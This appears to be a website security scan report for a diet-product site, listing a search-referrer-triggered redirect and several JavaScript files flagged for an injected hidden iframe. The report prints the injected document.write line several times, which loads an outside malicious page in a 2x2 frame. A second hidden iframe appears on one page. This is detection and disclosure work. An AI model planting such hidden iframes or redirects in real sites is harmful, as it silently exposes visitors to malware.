Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://clinicalslimdown.com/ (request sent with a search-engine Referer header, imitating a visitor who arrives from search results) GET / HTTP/1.1 Host: clinicalslimdown.com Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Wed, 17 Sep 2014 17:31:23 GMT Location: http://kozijnen.com/czof.html?h=664356 Server: Apache Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | malicious |
Scanned pages/files
Request | Server response | Status |
http://clinicalslimdown.com/ | 200 OK Content-Length: 13714 Content-Type: text/html | clean |
http://clinicalslimdown.com/js/jquery.min.js | 200 OK Content-Length: 57410 Content-Type: application/javascript | malicious |
Malicious code - flagged by antivirus engines (see the antivirus report below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
File content excerpt (truncated): (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/js/featuredcontentglider.js | 200 OK Content-Length: 7470 Content-Type: application/javascript | malicious |
Malicious code - flagged by antivirus engines (see the antivirus report below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
File content excerpt (shortened; part of the file is omitted): jQuery.noConflict() var featuredcontentglider={ leftrightkeys: [37, 39], csszindex: 100, ajaxloadingmsg: '<b>Fetching Content. Please wait...</b>', glide:function(config, showpage, isprev){ var selected=parseInt(showpage) if (selected>=config.$contentdivs.length){ alert("No else featuredcontentglider.setuptoggler($, config) $(window).bind('unload', function(){ config.$togglerdiv.unbind('click') config.$toc.unbind('click') config.$next.unbind('click') config.$prev.unbind('click') if (config.persiststate) featuredcontentglider.setCookie(config.gliderid, config.$togglerdiv.attr('lastselected')) config=null }) }) } }
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/js/jqueryslidemenu.js | 200 OK Content-Length: 2666 Content-Type: application/javascript | malicious |
Malicious code - flagged by antivirus engines (see the antivirus report below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
File content excerpt (shortened; part of the file is omitted): var arrowimages={down:['downarrowclass', '', 0], right:['rightarrowclass', '']} var jqueryslidemenu={ animateduration: {over: 200, out: 100}, buildmenu:function(menuid, arrowsvar){ jQuery(document).ready(function($){ var $mainmenu=$("#"+menuid+">ul") var $headers=$mainmenu.find("ul").parent }, function(e){ var $targetul=$(this).children("ul:eq(0)") $targetul.slideUp(jqueryslidemenu.animateduration.out) } ) $curobj.click(function(){ $(this).children("ul:eq(0)").hide() }) }) $mainmenu.find("ul").css({display:'none', visibility:'visible'}) }) } } jqueryslidemenu.buildmenu("myslidemenu", arrowimages)
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> | ||
http://clinicalslimdown.com/index.html | 200 OK Content-Length: 13714 Content-Type: text/html | clean |
http://clinicalslimdown.com/science.html | 200 OK Content-Length: 12558 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 35x1 src: http://nmsbaseball.com/post.php?id=687731 <iframe name=twitter scrolling=auto frameborder=no align=center height=1 width=35 src=http://nmsbaseball.com/post.php?id=687731> | ||
http://clinicalslimdown.com/program.html | 200 OK Content-Length: 11774 Content-Type: text/html | clean |
http://clinicalslimdown.com/recommended-foods.html | 200 OK Content-Length: 0 Content-Type: text/html | clean (empty response body, so there was no content to scan) |
http://clinicalslimdown.com/test404page.js | 404 Not Found Content-Length: 418 Content-Type: text/html | clean |
http://clinicalslimdown.com/low-glycemic.html | 200 OK Content-Length: 0 Content-Type: text/html | clean (empty response body, so there was no content to scan) |
http://clinicalslimdown.com/testimonial.html | 200 OK Content-Length: 9536 Content-Type: text/html | clean |
http://clinicalslimdown.com/contact-us.html | 200 OK Content-Length: 13920 Content-Type: text/html | clean |
http://clinicalslimdown.com/js/contactformvalidation.js | 200 OK Content-Length: 1992 Content-Type: application/javascript | malicious |
Malicious code - flagged by antivirus engines (see the antivirus report below): document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356></iframe>');
File content excerpt (shortened; part of the file is omitted): function has_id(id){try{var tmp=document.getElementById(id).value;}catch(e){return false;} return true;} function has_name(nm){try{var tmp=cfrm.nm.type;}catch(e){return false;} return true;} function $$(id){if(!has_id(id)&&!has_name(id)){alert("Field "+id+" does not exist!\n Form validation configur exp=/^[a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,4}$/; if($$(cvalue).match(exp)==null){ return false; } else{return true; } } else if(ctype=="NUMERIC"){ exp=/^\d+$/; if($$(cvalue).match(exp)==null){ return false; } else{return true; } } }, trim:function(s){if(s.length>0){return s.replace(/^\s+/,'').replace(/\s+$/,'');}else{return s;}}};
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://kozijnen.com/czof.html?j=664356 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://kozijnen.com/czof.html?j=664356> |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=clinicalslimdown.com
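Result: This site is not currently listed as suspicious. A blacklist lookup only reflects what the list operator has recorded so far, so this result does not contradict the redirect and hidden iframes reported above.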
Query: http://yandex.com/infected?l10n=en&url=http://clinicalslimdown.com/
Result: clinicalslimdown.com is not infected or malware details are not published yet.